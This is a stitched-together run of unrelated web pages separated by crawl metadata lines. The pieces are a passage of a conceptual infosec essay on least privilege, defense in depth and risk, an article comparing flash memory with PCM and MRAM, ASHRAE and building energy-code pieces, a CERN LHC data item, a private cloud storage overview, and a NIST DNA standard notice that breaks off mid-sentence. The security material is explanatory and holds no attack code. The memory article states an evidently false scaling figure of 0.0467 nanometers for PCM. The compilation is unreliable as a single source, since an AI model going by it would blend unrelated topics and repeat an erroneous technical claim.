privilege. Least privilege simply says that people and things should only be able to do what they need to do their jobs, and nothing else. The reason I include “things” is that that admins often configure automated tasks that need to be able to do certain things — backups for example. Well, what often happens is the admin will just put the user doing the backup into the domain admins group — even if they could get it to work another way. Why? Because it’s easier. Ultimately this is a principle that is designed to conflict directly with human nature, i.e. laziness. It’s always more difficult to give granular access that allows only specific tasks than it is to give a higher echelon of access that includes what needs to be accomplished. This rule of least privilege simply reminds us not to give into the temptation to do that. Don’t give in. Take the time to make all access granular, and at the lowest level possible. - Defense In Depth Defense In Depth is perhaps the least understood concept out of the four. Many think it’s simply stacking three firewalls instead of one, or using two antivirus programs rather than one. Technically this could apply, but it’s not the true nature of Defense In Depth. The true idea is that of stacking multiple types of protection between an attacker and an asset. And these layers don’t need to be products — they can be applications of other concepts themselves, such as least privilege. Let’s take the example of an attacker on the Internet trying to compromise a web server in the DMZ. This could be relatively easy given a major vulnerability, but with an infrastructure built using Defense In Depth, it can be significantly more difficult. The hardening of routers and firewalls, the inclusion of IPS/IDS, the hardening of the target host, the presence of host-based IPS on the host, anti-virus on the host, etc. — any of these steps can potentially stop an attack from being fully successful. The idea is that we should think in reverse — rather than thinking about what needs to be put in place to stop an attack, think instead of what all has to happen for it to be successful. Maybe an attack had to make it through the external router, the firewall, the switch, get to the host, execute, make a connection outbound to a host outside, download content, run that, etc, etc. What if any of those steps were unsuccessful? That’s the key to Defense In Depth — put barriers in as many points as possible. Lock down network ACLs. Lock down file permissions. Use network intrusion prevention, use intrusion detection, make it more difficult for hostile code to run on your systems, make sure your daemons are running as the least privileged user, etc, etc. The benefit is quite simple — you get more chances to stop an attack from becoming successful. It’s possible for someone to get all the way in, all the way to the box in question, and be stopped by the fact that malicious code in question wouldn’t run on the host. But maybe when that code is fixed so that it would run, it’ll then be caught by an updated IPS or a more restrictive firewall ACL. The idea is to lock down everything you can at every level. Not just one thing, everything — file permissions, stack protection, ACLs, host IPS, limiting admin access, running as limited users — the list goes on and on. The underlying concept is simple — don’t rely on single solutions to defend your assets. Treat each element of your defense as if it were the only layer. When you take this approach you’re more likely to stop attacks before they achieve their goal. - Prevention Is Ideal, But Detection Is A Must The final concept is rather simple but extremely important. The idea is that while it’s best to stop an attack before it’s successful, it’s absolutely crucial that you at least know it happened. As an example, you may have protections in place that try and keep code from being executed on your system, but if code is executed and something is done, it’s critical that you are alerted to that fact and can take action quickly. The difference between knowing about a successful attack within 5 or 10 minutes vs. finding out about it weeks later is astronomical. Often times having the knowledge early enough can result in the attack not being successful at all, i.e. maybe they get on your box and add a user account, but you get to the machine and take it offline before they are able to do anything with it. Regardless of the situation, detection is an absolute must because there’s no guarantee that you’re prevention measures are going to be successful. The CIA Triad The CIA triad is a very important trio in information security. The “CIA” stands for Confidentiality, Integrity, and Availability. These are the three elements that everyone in the industry is trying to protect. Let’s touch on each one of these briefly. - Confidentiality : Protecting confidentiality deals with keeping things secret. This could be anything from a company’s intellectual property to a home user’s photo collection. Anything that attacks one’s ability to keep private that which they want to is an attack against confidentiality. - Integrity: Integrity deals with making sure things are not changed from their true form. Attacks against integrity are those that try and modify something that’s likely going to be depended on later. Examples include changing prices in an ecommerce database, or changing someone’s pay rate on a spreadsheet. - Availability: Availability is a highly critical piece of the CIA puzzle. As one may expect, attacks against availability are those that make it so that the victim cannot use the resource in question. The most famous example of this sort of attack is the Denial Of Service Attack. The idea here is that nothing is being stolen, and nothing is being modified. What the attacker is doing is keeping you from using whatever it is that’s being attacked. That could be a particular server or even a whole network in the case of bandwidth-based DoS attacks. It’s a good practice to think of information security attacks and defenses in terms of the CIA triad. Consider some common techniques used by attackers — sniffing traffic, reformatting hard drives, and modifying system files. Sniffing traffic is an attack on confidentiality because it’s based on seeing that which is not supposed to be seen. An attacker who reformats a victim’ s hard drive has attacked the availability of their system. Finally, someone writing modified system files has compromised the integrity of that system. Thinking in these terms can go a long way toward helping you understand various offensive and defensive techniques. Next I’d like to go over some extremely crucial industry terms. These can get a bit academic but I’m going to do my best to boil them down to their basics. A vulnerability is a weakness in a system. This one is pretty straight forward because vulnerabilities are commonly labeled as such in advisories and even in the media. Examples include the LSASS issue that let attackers take over systems, etc. When you apply a security patch to a system, you’re doing so to address a vulnerability. A threat is an event, natural or man-made, that can cause damage to your system. Threats include people trying to break into your network to steal information, fires, tornados, floods, social engineering, malicious employees, etc. Anything that can cause damage to your systems is basically a threat to those systems. Also remember that threat is usually rated as a probability, or a chance, of that threat coming to bear. An example would be the threat of exploit code being used against a particular vulnerability. If there is no known exploit code in the wild the threat is fairly low. But the second working exploit code hits the major mailing lists, your threat (chance) raises significantly. Risk is perhaps the most important of all these definitions since the main mission of information security officers is to manage it. The simplest explanation I’ve heard is that risk is the chance of something bad happening. That’s a bit too simple, though, and I think the best way to look at these terms is with a couple of formulas: Risk = Threat x Vulnerability Multiplication is used here for a very specific reason — any time one of the two sides reaches zero, the result becomes zero. In other words, there will be no risk anytime there is no threat or no vulnerability. As an example, if you are completely vulnerable to xyz issue on your Linux server, but there is no way to exploit it in existence, then your risk from that is nil. Likewise, if there are tons of ways of exploiting the problem, but you already patched (and are therefore not vulnerable), you again have no risk whatsoever. A more involved formula includes the impact, or cost, to the equation (literally): Risk = Threat x Vulnerability x Cost What this does is allow a decision maker to attach quantitative meaning to the problem. It’s not always an exact science, but if you know that someone stealing your business’s most precious intellectual property would cost you $4 billion dollars, then that’s good information to have when considering whether or not to address the issue. That last part is important. The entire purpose of assigning a value to risk is so that managers can make the decisions on what to fix and what not to. If there is a risk associated with hosting certain data on a public FTP server, but that risk isn’t serious enough to offset the benefit, then it’s good business to go ahead and keep it out there. That’s the whole trick — information security managers have to know enough about the threats and vulnerabilities to be able to make sound business decisions about how to evolve the IT infrastructure. This is Risk Management, and it’s the entire business justification for information security. Policy — A policy is a high level statement from management saying what is and is not allowed in the organization. A policy will say, for example, that you can’t read personal email at work, or that you can’t do online banking, etc. A policy should be broad enough to encompass the entire organization and should have the endorsement of those in charge. Standard — A standard dictates what will be used to carry out the policy. As an example, if the policy says all internal users will use a single, corporate email client, the standard may say that the client will be Outlook 2000, etc. Procedure — A procedure is a description of how exactly to go about doing a certain thing. It’s usually laid out in a series of steps, i.e. 1) Download the following package, 2) Install the package using Add/Remove Programs, 3) Restart the machine, etc. A good way to think of standards and procedures is to imagine standards as being what to do or use, and procedures as how to actually do it. In this section I’d like to collect a series of important ideas I have about information security. Many of these aren’t rules, per say, and are clearly opinion. As such, you’re not likely to learn them in a class. Hopefully, though, a decent number of those in the field will agree with most of them. The goal of Information Security is to make the organization’s primary mission successful Much hardship arises when security professionals lose site of this key concept. Security isn’t there because it’s cool. It’s there to help the organization do what it does. If that mission is making money, then the main mission of the security group — at its highest level — is to make that company money. To put it another way, the reason the security group is even there in the first place is to keep the organization from losing money. This isn’t a “leet” way to look at things for those who are into the novelty of being in infosec, but it’s a mentality that one needs to have to make it in the industry long-term. This is becoming increasingly the case as companies are starting to put a premium on the professionals who see security as a business function rather than a purely technical exercise. Current IT infrastructure makes cracking trivial While many of the most skilled attackers can (and have) come up with some ingenious ways to leverage vulnerabilities in systems, the ability to do what we see everyday in the security world is fundamentally based on horribly flawed architecture. Memory management, programming languages, and overall security design — none of these things we use today were designed with security in mind. They were designed by academics for academics. To use an analogy, I think we are building skyscrapers with balsa wood and guano. Crackers repeatedly tear into us at will and we can do nothing but patch and pray. Why? Because we’re trying to build hundreds of feet into the air using shoddy materials. Balsa wood and guano make excellent huts — huts that stand up to a casual rain storm and a bump or two. But they don’t do well against tornados, earthquakes, or especially hooligans with torches. For that we need steel. Today we don’t have any. Today we continue to build using the same old materials. The same memory management issues that allow buffer overflows to run rampant, the same programming language issues that allow most to write dangerous code easier than not, etc. Until we have new materials to build on we’ll always remain behind the curve. It’s just too easy to light wood on fire or smash a hole in it. So, all analogies aside, I think within the next decade or so we’ll see the introduction of new system architecture models — models that are highly restrictive and run using a “default closed” paradigm. New programming languages, new IDEs, new compilers, new memory management techniques — all designed from the ground up to be secure and robust. The upshot of all of this is that I think that within that time period we’ll see systems that can be exposed to the world and stand on their own for years with little chance of compromise. Successful attacks will still happen, of course, but they’ll be extremely rare compared to today. Security problems will never go away, we all know that, but they’ll return to being human/design/configuration issues rather than issues with gaping technological flaws. Security by obscurity is bad, but security with obscurity isn’t I’ve been in many debates online over the years about the concept of Security by Obscurity. Basically, there’s a popular belief out there that if any facet of your defense relies on secrecy, then it’s fundamentally flawed. That’s simply not the case. The confusion is based on the fact that people have heard security by obscurity is bad, and most don’t understand what the term actually means. As a result, they make the horrible assumption that it means relying on obscurity — even as an additional layer to already good security — is bad. This is unfortunate. What security by obscurity actually describes is a system where secrecy is the only security. It comes from the cryptography world where poor encryption systems are often implemented in such a way that the security of the system depends on the secrecy of the algorithm rather than that of the key. That’s bad — hence the reason for security by obscurity being known as a no-no. What many people don’t realize is that adding obscurity to security that’s already solid is not a bad thing. A decent example of this is the Portknocking project. This interesting tool allows one to “hide” daemons that are available on the Internet, for example. The software watches firewall logs for specific connection sequences that come from trusted clients. When the tool sees the specific knock on the firewall, it opens the port. The key here is that it doesn’t just give you a shell — that would be security by obscurity. All it does at that point is give you a regular SSH prompt as if the previous step wasn’t even involved. It’s an added layer, in other words, not the only layer. Security is a process rather than a destination This is a pretty common one but it bears repeating. You never get there. There’s no such thing. It’s something you strive for and work towards. The sooner one learns that the better. Complexity is the enemy of security You may call me a weirdo, but I think the entire concept of simplicity is a beautiful thing. This applies to web design, programming, life organization, and yes — security. It’s quite logical that complexity would hinder security because one’s ability to defend their system rests heavily on their understanding of it. Complexity makes things more different to understand. Enough said. My hope is that this short collection of ideas about information security will be of use to someone. If you have any questions or comments feel free to email me at firstname.lastname@example.org. I’m sure I’ve left out a ton of stuff that should have gone into this, and I’d appreciate any scolding along those lines.:
<urn:uuid:eb845c92-60f8-48f6-9068-9dd4f62b4dfe>
CC-MAIN-2017-04
https://danielmiessler.com/study/infosecconcepts/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00278-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949706
4,126
2.515625
3
Article by Ken Lee Flash to the Future – The Next Generation of Non-Volatile Memory Quickly, name a gadget that didn't even exist in the year 2000 but has since transformed our culture and the way we live today. 99% of you probably answered with MP3 player, tablet computer, GPS, e-Reader or smart phone. What do all of these devices have in common? For one thing, they are all super portable, and that feature is due to the unbridled success of Flash memory. The development and maturation of NAND Flash as an affordable, non-volatile, solid-state data storage solution has helped usher in an era of mobile technology. It has allowed us to invent gadgets that simply would not have worked if incorporated with spinning platter drives. However, after a decade of revolutionizing the technology industry, Flash is reaching its limits for further development. In order to increase Flash's maximum capacity manufacturers have been shrinking the distance between transistors on flash chips over the years. In 2000 Flash technology was manufactured using a 180-nanometer process. Today, modern NAND Flash cells are for the most part manufactured using a 32nm process, with some bleeding-edge manufacturers moving to a 24nm process. The only issue with this is that as Flash continues to shrink it becomes less and less reliable. As of April 2011, the theoretical minimum Flash cell size is 19nm. Beyond that point, the stability of Flash becomes highly suspect. As we approach the limit of Flash technology, it is prudent to look towards the future and consider a couple of promising non-volatile, solid-state storage technologies that may succeed Flash memory in our mobile devices. Like Flash, Phase-change memory (aka PRAM or PCM) is non-volatile, solid-state computer memory; meaning that it retains information when powered off and has no moving parts. Unlike Flash which works by changing the electronic charge stored within gates to set a bit as a 1 or 0, PCM uses an electric current to produce heat which switches a chalcogenide glass between crystalline and amorphous states to set a bit as a 1 or 0. PCM has several significant advantages over Flash: - PCM can effectively write data 30x faster. The memory element can change the state of a single bit from a 1 to 0. In Flash if a bit is set to 0, the only way it can be changed to a 1 is by erasing an entire block of bits. - PCM can be scaled to 0.0467 nanometers without any loss of reliability. - PCM is more durable than Flash. Flash cells degrade quickly because the burst of voltage across the cell causes degradation. Once cells begin degrading, they leak electric charge causing corruption and loss of data. Flash memory is rated for about 5000 writes per sector, and most devices employ wear leveling to make them stable up to 1 million write cycles. PCM also degrades with use due to thermal expansion and metal migration but at a much slower rate. Theoretically PCM should endure up to 100 million write cycles. - PCM is suitable for use in more environments than Flash. Because Flash relies on trapped electrons to store information, it is susceptible to data corruption due to exposure to radiation. PCM exhibits a higher resistance to radiation and therefore can be used in space and military applications. Magentoresistive RAM (aka MRAM) is another non-volatile, solid state technology has been in development since the mid 1990s. MRAM stores data using magnetic charge as opposed to electrical charge. MRAM is composed of pairs of miniscule ferromagnetic plates which make up the memory cells. Each cell consists of two magnetic layers separated by an insulating layer. Each cell can be manipulated by an induced magnetic field which sets the polarity of the magnetic layers in parallel orientation or in an anti-parallel orientation. The different orientations determine whether the bit is set to a 1 or a 0. MRAM has many significant advantages over Flash and PCM: - MRAM can be read and written to faster, and can be done on a much smaller scale. Like PCM, single bits can be changed from 1 to 0 without having to erase an entire block. - MRAM degrades substantially slower than either Flash or PCM. - MRAM could replace all memory in the future, making it a universal storage technology. It should offer speeds close to that of SRAM, with densities approaching that of DRAM, while being able to store information when power is removed like Flash or EEPROM. - Like PCM, MRAM also exhibits a higher resistance to radiation and therefore can be used in space and military applications that Flash is not suited for. It should be noted that we can only speculate on when manufacturers will have to stop using Flash as the primary storage media in their products. Consider that in 2002, many experts assumed that Flash cells would not be stable when scaled past 45nm and predicted that Flash technology would need to be replaced by 2010. We know now that those predictions proved to be false. Many experts today believe that technological breakthroughs, like implementing graphene, will allow the technology to be scaled down to 10nm without loss of stability. If this is true, Flash may still be the dominant memory in mobile devices for many years to come. Even though emerging technologies like PCM or MRAM are vastly superior to Flash in many ways, PCM and MRAM are much more expensive to manufacture than Flash. As long as Flash can remain a viable storage media there are too few incentives, and too much production costs for manufacturers to rush devices that use next generation memory into the market. Ken Lee is a product manager at Kanguru Solutions specializing in data storage and duplication equipment. Cross-posted from Kanguru Blog – Technology on the Move!
<urn:uuid:b60cec85-aa47-4ea5-90f5-b6adb888ebbb>
CC-MAIN-2017-04
http://www.infosecisland.com/blogview/17308-The-Next-Generation-of-Non-Volatile-Memory.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00516-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94221
1,209
3.375
3
ASHRAE 90.1 is a US standard that provides minimum requirements for energy efficient designs for buildings except for low-rise residential buildings. The original standard, ASHRAE 90, was published in 1975. There have been multiple editions to it since. In 1999, the Board of Directors for ASHRAE voted to place the standard on continuous maintenance, based on rapid changes in energy technology and energy prices. This allows it to be updated multiple times in a year. The standard was re-named ASHRAE 90.1 in 2001. It has since been updated in 2004, 2007, 2010, and 2013 to reflect newer and more efficient technologies. Wikipedia. ASHRAE Journal | Year: 2014 Steven Taylor highlights some of the essential points for designing and controlling waterside economizers. To maximize performance the economizer must be integrated with the chillers, meaning the economizer has to be able to reduce the load on the chillers even if it cannot handle the entire load. The same cooling towers and condenser water pumps should be used to serve both the economizer heat exchanger and the chiller condensers. While cooling tower capacity is not affected by the economizer, it may be necessary to reduce the design approach temperature to meet Standard 90.1 Section 188.8.131.52.1 waterside economizer requirements, particularly for plants with high loads in cold weather. Cooling towers should be selected so that as many tower cells as possible can be enabled when the economizer is enabled to maximize efficiency and capacity while maintaining minimum flow rates required by the tower manufacturer to prevent scaling. The heat exchanger should be a plate & frame type and selected for an approach of about 3°F above the temperature of the condenser. Source ASHRAE Transactions | Year: 2012 Analytical evidence and experimental results suggest that return air temperature control limits the effectiveness and efficiency of data center cooling. Return air temperature control rarely, and often only coincidentally, enables a close match of air provisioning relative to IT equipment consumption. Other methods that divorce the flow control from the temperature control offer much better opportunities to tune cooling performance, either manually or automatically, producing improvements in operational energy and capital usage. Under-floor static pressure control is one such method. This paper presents evidence that suggests that static pressure control is a viable and often superior alternative to return air temperature control. © 2012 ASHRAE. Source ASHRAE Journal | Year: 2014 Experts shared their views on the lessons learned from the ASHRAE head quarters (HQ) renovation project. ASHRAE did its first major renovation in 1990 by gutting the interior, updating the mechanical systems, installing a new insulated glass curtain wall system, and abating asbestos materials on the interior. The reason for having three mechanical systems was to achieve the goal of creating a 'Living Lab' for ongoing research by the Society and its members. More than 1,300 points were monitored and stored on the systems and spaces in this building. The stored and real-time data were made available to the members around the world via Internet. ASHRAE expected to learn more about the long-term operation, maintenance, and performance of buildings with the various types of systems used throughout this project. Source News Article | December 23, 2015 The Paris climate talks gave strong impetus to the world’s determination to curtail climate pollution through policies that create jobs and economic growth while simultaneously cutting emissions. While they may be a lower profile solution, improved building codes are a cornerstone of a successful climate policy. One reason for the paucity of discussion of codes is that climate policy is made on a national level, while in the United States and many other countries, energy codes are adopted and enforced primarily at the state or even local level. Nevertheless, new energy codes have the potential to save 160 MMTCE (million metric tons of carbon equivalent) of climate pollution in America by 2030–some 3 percent of emissions of the entire nation– merely by adopting model codes that already exist. Adopting the 2015 version of the International Energy Conservation Code (IECC) would result in emissions savings with an economic benefit of a quarter of a trillion dollars over the next 15 years. These savings compound over time: by 2050 the savings will be about double the savings in 2030, just because the codes apply to more and more buildings that have been constructed since 2015. Savings will also get much larger for two reasons explored next: NRDC actively works with coalitions of businesses and other nonprofits to raise the bar on energy codes. Figure 1 shows the progress of codes. Figure 1. progress of model codes in the United States The IECC code applies most commonly to residential buildings, while the ASHRAE standard is exclusively for commercial buildings. Both standards are voluntary models, but all U.S. states are required by law to adopt or consider them, and some foreign jurisdictions adopt them or modify and adopt them as well. Figure 1 demonstrates the accelerating progress we have made since the 2004-6 codes, which were hardly changed compared to 1975. From 2006 until 2012, coalitions in support of stronger codes succeeded in getting a reduction in energy use of some 30 percent. During the debate over the code for 2015, NRDC believed that there was still potential for more savings. By offering home builders something they really wanted–flexibility and the reduction of administrative burden–in return for increased savings, NRDC successfully helped to create an alternative path for homebuilders to comply with the code. The 2015 IECC contains a new tradeoff method that allows a home to meet an Energy Rating Index (ERI), the most prevalent of which is the HERS index. Using the ERI path to comply with the 2015 code requires savings of at least 45 percent compared to 2006, but allows for increased flexibility with how the savings are achieved. The ERI is like a miles-per-gallon rating for homes, in which a score of 100 means the home meets the 2006 IECC code and a score of zero means that home has no net energy consumption. Thus a score of 60 means an energy savings of 40 percent. Inclusion of the ERI is valuable to consumers: it tells the buyer how efficient the home is and how much money they should expect to spend on utility costs. The HERS score makes efficiency visible by allowing comparisons between homes. As about one-third of all new homes sold in 2014 were rated with a HERS score, there is competition between builders for a lower score. Thus, even though the tightest codes result in the average home having a HERS score of about 69, and even though most jurisdictions enforce the weaker 2009 code, the average HERS score last year was 63, showing that the existence of HERS scores on a wide basis is causing competition among builders over how much better than code their efficiency is. This year, the 2015 code has been adopted in several states, including Vermont and Maryland, and is in the process of adoption in several others. Even in states that did not cleanly adopt the model 2015 IECC building code, we still saw some progress. For example, in Texas, the largest new homes market in the country, the legislature passed a law that adopts the same prescriptive check-list of required insulation levels, etc., as in the 2015 IECC as well as the optional ERI method. While the Texas code contains ERI scores that are higher (therefore, weaker) than the 2015 model code, either method of compliance is a substantial improvement over the 2009 code. Most studies of efficiency potential answer the question of how much we would save if we used technologies current at the time of the analysis, but do not assume any improvement in those technologies. But in areas where we have tried consistently to improve efficiency through up-to-date policies, we have seen rates of improvement in energy consumption of 6 percent per year or more. The study whose results I cited abovedistinguishes itself by modeling an improvement of 5 percent for every code cycle. Code cycles occur every three years, so this is a very modest assumption. As noted above, we have been able to achieve savings of about 15 percent every code cycle since 2006. An improvement rate of 6 percent per year–which we have achieved in the California energy code since 1975–would yield a 20 percent improvement per triennial cycle. This would lead to a much larger savings projection, especially for 2050. Other areas where we have been able to achieve continual improvement rates of 6 percent annually are noted in my book, “Invisible Energy: Strategies to Rescue the Economy and Save the Planet.” In advance of the next code cycle beginning in 2018, NRDC is working with a broad variety of stakeholders both to tighten efficiency requirements by about 5 to 10 percent and to set minimum requirements for savings from efficiency alone before accounting for solar generation. Currently, it is unclear whether the version of the ERI score used in the IECC counts energy savings from solar. NRDC supports a middle-ground proposal that will allow some solar tradeoff but also guarantee a minimum level of efficiency. While investing in energy efficiency is ultimately cheaper to the consumer, there are attractive financing options and tax credits that help reduce the upfront costs to the builder of solar generation equipment and thus create a non-level playing field. NRDC fully supports efforts to increase solar power, but solar must be coupled with appropriate levels of efficiency to be most effective. This type of limited tradeoff for solar power is already being used in Vermont and Massachusetts. So far we have talked about codes in most states, which rely on national models. But California maintains its own code, which is usually more advanced than those of other states. This year the California Energy Commission adopted code upgrades that will save some 25 percent of energy use compared to the previous code, following a 2016 update that itself saves some 25 percent. We are working with the Commission and with stakeholders to assure that the 2019 California code is consistent with the state’s goal of zero-net-energy homes by 2020 (meaning the home’s total annual energy use is roughly equal to the amount of renewable energy created onsite). We are also working collaboratively with builders to try to harmonize California’s HERS system with the national system. Currently, the California system is minimally used: builders and retrofitters find it too bureaucratic. Its outputs do not agree with those of the national system, so that a HERS 80 home in California may use less energy than a HERS 65 in Nevada. While some advanced features of the California system should be retained, and perhaps extended to the national system, in other areas the two systems disagree without any good reason. This is a barrier to using HERS ratings for consumer transparency in California–a barrier we hope to eliminate in 2016. Energy codes are a powerful tool for cutting emissions and lifting the economy. NRDC plans to begin the next three-year processes of continually improving energy codes at the national and state levels and anticipates strong success in 2016 and beyond. We encourage states and cities to adopt the most current codes to maximize emissions savings and job creation. News Article | December 22, 2015 More efficient furnaces and rooftop AC units could save 15 quads of energy by 2045. The U.S. Department of Energy announced an agreement for new energy efficiency standards for commercial furnaces and rooftop air conditioners. The federal government called the standards the largest in U.S. history for the amount of energy that will be saved: nearly 15 quadrillion BTU over the next 30 years. “They will save about the same amount of energy as all the coal burned in the U.S. to generate electricity in a year,” according to Rhea Suh, president of Natural Resources Defense Council. “These are very, very promising days in the global fight to slow, stop and reverse climate change.” Over the next three decades, the increased efficiency will cut 885 million metric tons of carbon dioxide, bringing the DOE more than two-thirds of the way to its goal of reducing carbon pollution by 3 billion metric tons. Rooftop units cool about half the total commercial floor space in the U.S., according to the DOE. A typical owner would save about $5,000 to $10,000 over the lifetime of the equipment. But the actual savings are higher for an entire AC system, as a typical big-box store may have more than 20 units. Starting in 2018, rooftop AC will have to be about 13 percent more efficient than it is today. By 2023, it will have to be 25 percent to 30 percent more efficient than current models. Commercial furnaces will have to have thermal efficiencies of at least 81 percent for gas furnaces and 82 percent for oil furnaces by 2023. Although much of the cleantech industry’s attention was focused on the spending bill and the Investment Tax Credit extension for wind and solar last week, energy efficiency advocates were heralding this announcement. “DOE is ringing in the holiday season with truly monumental energy and economic savings,” Andrew deLaski, executive director of the Appliance Standards Awareness Project, said in a statement. With efficiency advocates and industry stakeholders at the negotiating table, the DOE also made changes to how the efficiency of rooftop units would be calculated. The standard will be based on the integrated energy efficiency ratio (IEER) metric, which captures the AC’s energy use over a range of operating conditions, according to NRDC. The test procedure will also take into account total fan use, which can be a considerable chunk of an air conditioner’s total energy use. The push for standards started five years ago with DOE’s Rooftop Unit Challenge, which called on manufacturers to deliver more efficient systems — up to 50 percent more efficient than current ASHRAE 90.1 standards — at competitive prices. In 2012, Daikin’s Rebel rooftop unit system was the first to meet challenge. A year later, Carrier met the challenge. Now, five companies have units that meet the specifications. The standards will be finalized late in 2016, and little opposition is expected. Greentech Media (GTM) produces industry-leading news, research, and conferences in the business-to-business greentech market. Our coverage areas include solar, smart grid, energy efficiency, wind, and other non-incumbent energy markets. For more information, visit: greentechmedia.com , follow us on twitter: @greentechmedia, or like us on Facebook: facebook.com/greentechmedia.
<urn:uuid:fc7a6078-2483-4baa-8c59-589e64d439c4>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/ashrae-83820/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00332-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943724
2,987
2.65625
3
In the Northwest suburbs of Geneva on the Franco–Swiss border sits CERN (the European Organization for Nuclear Research), the world’s largest particle physics laboratory. CERN is home to the most ambitious particle physics project of our time, the search for the Higgs Boson particle, a hypothetical sub-atomic particle that is thought to give mass to all other particles. This elusive speck is so treasured that some have dubbed it the God Particle. In order to coax the Higgs Boson out from hiding, detectors at the Large Hadron Collider (LHC), CERN’s giant particle accelerator, are smashing together beams of high-energy protons. The most promising collisions are converted into electronic signals, and sent to a computer farm where they undergo a digital reconstruction. But this is only the beginning of the data’s long journey. An article in Nature looks at the path the data must travel in order to reach member research sites, where the analysis can commence. Here’s a breakdown of the process: Even after rejecting 199,999 of every 200,000 collisions, the detector churns out 19 gigabytes of data in the first minute. In total, ATLAS and the three other main detectors at the LHC produced 13 petabytes (13 × 10^15 bytes) of data in 2010, which would fill a stack of CDs around 14 kilometres high. That rate outstrips any other scientific effort going on today, even in data-rich fields such as genomics and climate science (see Nature 455, 16–21; 2008). And the analyses are more complex too. Particle physicists must study millions of collisions at once to find the signals buried in them — information on dark matter, extra dimensions and new particles that could plug holes in current models of the Universe. Their primary quarry is the Higgs boson, a particle thought to have a central role in determining the mass of all other known particles. The data get sent to the Worldwide LHC Computing Grid, an extensive network of linked computers, comprising approximately 200,000 processing cores and 150 petabytes of disk space. From here it is distributed to 34 countries through leased data lines at a rate of 5 gigabytes per second. All the researchers need a copy of the data, but if they all logged into the system at the same time, it would overload and shut down. So instead, the grid automatically routes copies of the data to the participating research institutions. The datasets are split up so that different research groups each get relevant pieces. When the information reaches its destination, the project partners will access it, and run their experiments. As more and more data are collected, a picture begins to form. With each petabyte of data that flows through the grid, the scientists could be one step closer to finding proof of the God Particle, and achieving a deeper understanding of the big bang.
<urn:uuid:79c465c6-f254-415c-a780-ef37ae7c753e>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/01/19/cern_generates_worldwide_data_stream/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00481-ip-10-171-10-70.ec2.internal.warc.gz
en
0.910247
590
3.421875
3
But a storage cloud doesn't have to be public. A wide range of private cloud storage products have been introduced by vendors, including name-brand companies such as EMC, with its Atmos line, and smaller players like ParaScale and Bycast. Other vendors are slapping the "cloud" label on existing product lines. Given the amorphous definitions surrounding all things cloud, that label may or may not be accurate. What's more important than semantics, however, is finding the right architecture to suit your storage needs. A prototypical cloud storage system is made up of a number of x86 servers, each with its own storage, most commonly using four to 16 SATA drives. Users and their applications access the system through standard file access protocols like CIFS and NFS or via object storage and retrieval protocols like SOAP and REST. The storage nodes in a private cloud are linked together with a layer of smart software, which performs several functions. First, it maintains a global name space that allows all the storage in the cluster to be accessed as a single entity, so that administrators can add storage capacity on the back end without having to tell applications at the front end how to reach it. The software also handles drive failures and keeps data available to applications and end users. A private cloud storage infrastructure should also be able to scale from hundreds of terabytes to multiple petabytes. That level of scalability is achieved not with a forklift upgrade, but simply by adding more servers as they're needed. This architecture provides two major benefits. First, storage administrators can configure and provision new storage nodes quickly and inexpensively. Second, administrators can add capacity only as demand requires, instead of purchasing additional disk space to meet anticipated future growth and then having that capacity sit idle in the present. However, there are also trade-offs. Cloud storage is best suited to unstructured data, such as medical images, engineering drawings, and Office documents. For another, because each x86 server isn't as reliable as a high-end enterprise disk array, a private cloud must store copies of the data on multiple nodes. This requires more raw disk space than an enterprise disk array using a RAID-5 or 6 system. For example, if you set a policy for your private cloud to keep three copies of a 60-GB file for data protection, it would require 180 GB of disk, whereas a 6+2 RAID-6 system would need just 80 GB. Beyond Low Cost Several other vendors include location-aware policy engines that copy data to nodes in specific geographical locations. Data Direct Networks' Web Object Store, Bycast's StorageGrid, and EMC's Atmos systems can specify that two copies of each object in a folder should be stored in New York and Los Angeles, and that copies also should be stored in two other locations. This not only protects data from data center failures but can also put objects on storage clusters close to the users who need them. Bycast's policy engine takes this notion one step further by including elements, such as storage tiering, that can migrate objects from more-expensive to less-expensive disk, and even to and from tape. Organizations planning to offer private cloud storage services to internal departments may want to consider multitenant features that allow storage to be partitioned among different groups. For example, IT could carve out one section of the private cloud for HR and another for marketing, and then charge those departments based on usage. This means having delegated administration models and/or virtual servers that restrict each group's access and visibility to only their own data and the resources assigned to them. A multitenant storage system should also include accounting features that collect usage data, such as peak utilization, that will help IT in determining chargebacks.
<urn:uuid:5ed137a6-e19f-4799-9b36-dfe6e0a8da81>
CC-MAIN-2017-04
http://www.networkcomputing.com/storage/understanding-private-cloud-storage/297434849?cid=sbx_bigdata_related_mostpopular_cloud&itc=sbx_bigdata_related_mostpopular_cloud&piddl_msgorder=asc
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00389-ip-10-171-10-70.ec2.internal.warc.gz
en
0.9453
767
2.578125
3
Thanks to the polymerase chain reaction (PCR), a method for making multiple copies of DNA fragments, even tiny bits of biological evidence (in the form of hair, tissue, bones, teeth, blood or other bodily fluids) from a crime scene can be used to isolate genetic material that eventually can identify a suspect or victim. A new Standard Reference Material from the National Institute of Standards and Technology (NIST), SRM 2372 (Human DNA Quantitation Standard), is available to help ensure the success of this identification process, known as DNA profiling. One profiling method popular with forensic experts uses short tandem repeats (STRs are short identical sequences of DNA found in specific regions of a chromosome) to compare samples of DNA from a crime scene to DNA from a suspect or victim. Commercial PCR systems that amplify STRs work best if the amount of DNA-measured in nanograms per microliter of solution-fed into the system is within a narrow range. Too concentrated a solution overwhelms the detection apparatus; too diluted yields poor results or none at all. DNA quantitation-assessing the amount of DNA present in a crime scene sample-is the necessary precursor to making a suitable solution for profiling. A widely used method to achieve this is quantitative PCR (qPCR); however, current commercial qPCR kits may produce varying values for the DNA concentrations in the kit's reference samples, rendering these standards less reliable for assaying the quantity of extracted evidential DNA. SRM 2372 can be used by qPCR manufacturers to calibrate their systems in the factory so that measurements made with the kits in forensic laboratories are consistently accurate. The SRM contains samples of 